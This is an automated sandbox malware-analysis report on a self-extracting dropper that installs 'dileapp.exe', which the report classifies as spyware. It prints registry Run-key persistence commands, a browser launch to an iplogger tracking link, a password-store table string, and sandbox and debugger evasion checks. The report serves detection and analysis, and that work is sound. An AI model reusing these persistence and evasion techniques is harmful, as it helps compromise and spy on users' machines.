                Source: dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: dileapp.exe, 00000009.00000003.1862319105.00000000058FF000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954354098.0000000006108000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: dileapp.exe, 00000009.00000003.1862319105.00000000058FF000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954354098.0000000006108000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49748 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49757 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49763 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49764 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49770 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49771 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49778 version: TLS 1.2

                System Summary

                Source: dileapp.exe.0.dr Static PE information: section name:
                Source: dileapp.exe.0.dr Static PE information: section name: .idata
                Source: dileapp.exe.0.dr Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00797070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                Source: C:\Users\user\Desktop\file.exe Code function: String function: 007ACDF0 appears 37 times
                Source: C:\Users\user\Desktop\file.exe Code function: String function: 007AD870 appears 31 times
                Source: C:\Users\user\Desktop\file.exe Code function: String function: 007ACEC0 appears 53 times
                Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                Source: dileapp.exe.0.dr Static PE information: Section: ZLIB complexity 0.9988467896757679
                Source: dileapp.exe.0.dr Static PE information: Section: fngpdisv ZLIB complexity 0.9945660806346209
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@32/5@9/6
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007A8BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_03
                Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
                Source: C:\Users\user\Desktop\file.exe Command line argument: *x~ 0_2_007AC131
                Source: C:\Users\user\Desktop\file.exe Command line argument: *a} 0_2_007AC131
                Source: C:\Users\user\Desktop\file.exe Command line argument: 8y~ 0_2_007AC131
                Source: C:\Users\user\Desktop\file.exe Command line argument: sfxname 0_2_007AC131
                Source: C:\Users\user\Desktop\file.exe Command line argument: sfxstime 0_2_007AC131
                Source: C:\Users\user\Desktop\file.exe Command line argument: STARTDLG 0_2_007AC131
                Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\win.ini
                Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: dileapp.exe, 0000000F.00000003.1984343715.0000000005C38000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983801001.0000000005C6F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exe ReversingLabs: Detection: 28%
                Source: dileapp.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
                Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\Netstat\dileapp.exe C:\Users\Public\Netstat\dileapp.exe
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: unknown Process created: C:\Users\Public\Netstat\dileapp.exe "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: unknown Process created: C:\Users\Public\Netstat\dileapp.exe "C:\Users\Public\Netstat\dileapp.exe"
                Source: unknown Process created: C:\Users\Public\Netstat\dileapp.exe "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: file.exe Static file information: File size 2210104 > 1048576
                Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                Source: C:\Users\Public\Netstat\dileapp.exe Unpacked PE file: 5.2.dileapp.exe.fd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW;
                Source: C:\Users\Public\Netstat\dileapp.exe Unpacked PE file: 9.2.dileapp.exe.fd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW;
                Source: C:\Users\Public\Netstat\dileapp.exe Unpacked PE file: 12.2.dileapp.exe.fd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW;
                Source: C:\Users\Public\Netstat\dileapp.exe Unpacked PE file: 15.2.dileapp.exe.fd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_5902140
                Source: dileapp.exe.0.dr Static PE information: real checksum: 0x1d95c5 should be: 0x1deca8
                Source: file.exe Static PE information: real checksum: 0x0 should be: 0x224cb2
                Source: dileapp.exe.0.dr Static PE information: section name:
                Source: dileapp.exe.0.dr Static PE information: section name: .idata
                Source: dileapp.exe.0.dr Static PE information: section name:
                Source: dileapp.exe.0.dr Static PE information: section name: fngpdisv
                Source: dileapp.exe.0.dr Static PE information: section name: tvvnknfw
                Source: dileapp.exe.0.dr Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007AD8B6 push ecx; ret 0_2_007AD8C9
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007ACDF0 push eax; ret 0_2_007ACE0E
                Source: dileapp.exe.0.dr Static PE information: section name: entropy: 7.978907373562353
                Source: dileapp.exe.0.dr Static PE information: section name: fngpdisv entropy: 7.954644533693645

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
                Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\dileapp.exe

                Boot Survival

                Source: C:\Users\Public\Netstat\dileapp.exe Window searched: window name: FilemonClass
                Source: C:\Users\Public\Netstat\dileapp.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\Public\Netstat\dileapp.exe Window searched: window name: RegmonClass
                Source: C:\Users\Public\Netstat\dileapp.exe Window searched: window name: Regmonclass
                Source: C:\Users\Public\Netstat\dileapp.exe Window searched: window name: Filemonclass
                Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat
                Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Netstat
                Source: C:\Users\Public\Netstat\dileapp.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\Public\Netstat\dileapp.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Netstat\dileapp.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\Public\Netstat\dileapp.exe System information queried: FirmwareTableInformation
                Source: C:\Users\Public\Netstat\dileapp.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\Public\Netstat\dileapp.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B72DA second address: 11B7302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCCB0D02D0Eh 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B7302 second address: 11B7353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 32357646h 0x0000000e mov dl, ah 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FCCB120DFD8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov cx, A4EFh 0x00000032 push 00000003h 0x00000034 xor dword ptr [ebp+13763676h], edx 0x0000003a push B7BDBA2Fh 0x0000003f push ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FCCB120DFDDh 0x00000047 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B744F second address: 11B7454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B7454 second address: 11B74D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 4FFF7F21h 0x00000013 or edx, 744D09E7h 0x00000019 push 00000003h 0x0000001b mov dword ptr [ebp+1376B64Bh], edx 0x00000021 mov edx, dword ptr [ebp+13762C74h] 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FCCB120DFD8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 mov dword ptr [ebp+13762DB2h], edx 0x00000049 push 00000003h 0x0000004b jmp 00007FCCB120DFE2h 0x00000050 mov esi, dword ptr [ebp+1376375Fh] 0x00000056 push 7E2282CDh 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B74D0 second address: 11B74D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B74D5 second address: 11B750E instructions: 0x00000000 rdtsc 0x00000002 je 00007FCCB120DFD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 41DD7D33h 0x00000013 mov edi, 4C09BFCFh 0x00000018 lea ebx, dword ptr [ebp+138F1FD2h] 0x0000001e pushad 0x0000001f mov dword ptr [ebp+1376310Bh], eax 0x00000025 mov esi, dword ptr [ebp+137621E6h] 0x0000002b popad 0x0000002c mov dword ptr [ebp+13763676h], edi 0x00000032 push eax 0x00000033 pushad 0x00000034 pushad 0x00000035 push eax 0x00000036 pop eax 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B750E second address: 11B7529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCCB0D02D14h 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C9722 second address: 11C973C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCCB120DFE6h 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C973C second address: 11C975C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jnl 00007FCCB0D02D06h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C975C second address: 11C9762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C9762 second address: 11C9766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A6384 second address: 11A6388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D695E second address: 11D6962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6AA0 second address: 11D6AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6AA5 second address: 11D6ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCCB0D02D0Ah 0x0000000b popad 0x0000000c jc 00007FCCB0D02D0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6ABE second address: 11D6AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FCCB120DFD8h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6AD1 second address: 11D6AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Ch 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6EC4 second address: 11D6EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
